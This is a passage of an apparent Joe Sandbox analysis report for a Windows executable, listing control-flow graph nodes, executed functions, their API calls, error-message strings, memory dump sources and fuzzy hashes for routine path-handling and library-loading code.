7ff7f250496a 56598->56603 56599 7ff7f25049cb CloseHandle 56599->56603 56638 7ff7f2504368 11 API calls 2 library calls 56600->56638 56639 7ff7f2504cd4 56601->56639 56607 7ff7f25049ff 56607->56603 56609 7ff7f2504ada 56608->56609 56610 7ff7f2504b97 56608->56610 56611 7ff7f2504b06 GetFileInformationByHandle 56609->56611 56657 7ff7f2504e10 21 API calls _fread_nolock 56609->56657 56612 7ff7f2504bc1 56610->56612 56613 7ff7f2504b9f 56610->56613 56616 7ff7f2504bb2 GetLastError 56611->56616 56617 7ff7f2504b2f 56611->56617 56614 7ff7f2504be4 PeekNamedPipe 56612->56614 56632 7ff7f2504b82 56612->56632 56613->56616 56618 7ff7f2504ba3 56613->56618 56614->56632 56660 7ff7f2504368 11 API calls 2 library calls 56616->56660 56621 7ff7f2504cd4 51 API calls 56617->56621 56659 7ff7f25043f4 11 API calls _set_fmode 56618->56659 56620 7ff7f2504af4 56620->56611 56620->56632 56624 7ff7f2504b3a 56621->56624 56623 7ff7f24fb870 _log10_special 8 API calls 56625 7ff7f25049c4 56623->56625 56650 7ff7f2504c34 56624->56650 56625->56598 56625->56599 56628 7ff7f2504c34 10 API calls 56629 7ff7f2504b59 56628->56629 56630 7ff7f2504c34 10 API calls 56629->56630 56631 7ff7f2504b6a 56630->56631 56631->56632 56658 7ff7f25043f4 11 API calls _set_fmode 56631->56658 56632->56623 56634->56590 56635->56596 56636->56603 56637->56595 56638->56607 56640 7ff7f2504cfc 56639->56640 56648 7ff7f2504a2d 56640->56648 56661 7ff7f250ea34 51 API calls 2 library calls 56640->56661 56642 7ff7f2504d90 56642->56648 56662 7ff7f250ea34 51 API calls 2 library calls 56642->56662 56644 7ff7f2504da3 56644->56648 56663 7ff7f250ea34 51 API calls 2 library calls 56644->56663 56646 7ff7f2504db6 56646->56648 56664 7ff7f250ea34 51 API calls 2 library calls 56646->56664 56649 7ff7f2504e10 21 API calls _fread_nolock 56648->56649 56649->56607 56651 7ff7f2504c50 56650->56651 56652 7ff7f2504c5d FileTimeToSystemTime 56650->56652 56651->56652 56653 7ff7f2504c58 56651->56653 56652->56653 56654 7ff7f2504c71 SystemTimeToTzSpecificLocalTime 56652->56654 56655 7ff7f24fb870 _log10_special 8 API calls 56653->56655 56654->56653 56656 7ff7f2504b49 56655->56656 56656->56628 56657->56620 56658->56632 56659->56632 56660->56632 56661->56642 56662->56644 56663->56646 56664->56648

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF7F24F33E0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7F24F3534), ref: 00007FF7F24F3411
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: GetLastError.KERNEL32(?,?,?,00007FF7F24F342E,?,00007FF7F24F3534), ref: 00007FF7F24F2A14
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7F24F342E), ref: 00007FF7F24F2A7D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: MessageBoxW.USER32 ref: 00007FF7F24F2ACF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\$$3&KP
                                                                                                                                                                                                                        • API String ID: 517058245-2522025935
                                                                                                                                                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction ID: 324d46c5197e621f43712a0d9c02314df2b84dde057860ffdb56dd83e582fb46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2219261B0858291FB21FB24E8513B9A250BFD9795FC00236DA7D8B5D5EFECE904C7A0
                                                                                                                                                                                                                        Function 00007FF7F24FF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                        • Instruction ID: 8168b787d564d7f34d58842c04def89b53a1d686124115137c9bfa2d16a5a0f4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6951E462B0924247FB28AE25940067AA291FFC4FB4F954634DE7C037D6CEFCE841C6A0
                                                                                                                                                                                                                        Function 00007FF7F2508C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1631347669.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631310735.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631384122.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631469895.00007FF7F2533000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1631534933.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction ID: 081db42f4627dccf1dcac8a50edd1f058ea2e01dfeb2b7bcc95d66e4399bf3a7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21A132A167068AEB24EF64C8446FC73B0FB04718F84067AD62C0BAC5EFB8D444C7A0